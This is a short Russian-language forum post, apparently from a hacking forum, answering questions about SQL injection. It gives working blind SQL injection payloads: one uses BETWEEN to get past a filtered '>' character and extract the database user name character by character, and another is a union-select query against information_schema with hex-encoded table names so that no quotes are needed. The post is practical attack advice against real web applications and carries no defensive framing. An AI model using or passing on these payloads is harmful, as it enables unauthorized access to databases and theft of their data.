27.09.2009, 20:09
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Сообщение от Ctacok
Есть SQL запрос.
1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=100,'1','0') '2
Т.е. ' нефильтруется и т.п.
НО
Фильтруется > на _.
Что делать?
Ну например заюзать between
1' and 1=if(ascii(substring(user(),1,1)) between 0 and 150,1,0)--+
Сообщение от Byrger
Допустим login=0x73716C696E6A666C6432 Ничего не выдаёт
А ты уверен, что что-то должно выдавать именно на этот логин? =)
Перевести название таблицы/колонки в hex или в CHAR, кому как нравится
Для hex это выглядит так(добавляем к hex впереди 0x что-бы база поняла, что за данные мы ей втюхиваем):
union+select+1,table_rows+from+information_schema. tables+where+table_name=0x7573657273
Некоторые индивидумы умудряются загонять в хекс или чар вместе с кавычками, тоесть так 'users'=27757365727327, так делать ненадо, база этого не оценит )
Какбэ и все
|
|
|